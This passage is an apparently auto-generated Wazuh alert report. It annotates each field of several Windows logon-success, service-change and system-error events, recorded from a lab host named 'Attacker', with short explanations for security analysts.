data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:53:34.5100079Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2377
Incremental log record number – handy for timeline order.

data.win.system.processID:  3028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:34Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-21T01:40:34Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:28.582+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:28.582+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533888.118803
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:41:55.1493380Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43476
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:28.801+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:28.801+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533888.126141
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:39.2603970Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2907
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5692
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:29.083+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:29.083+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533889.127951
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:42:50.7769481Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43478
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:29.973+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:29.973+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533889.135289
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:42:59.1075434Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43480
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:30.740+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:30.740+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
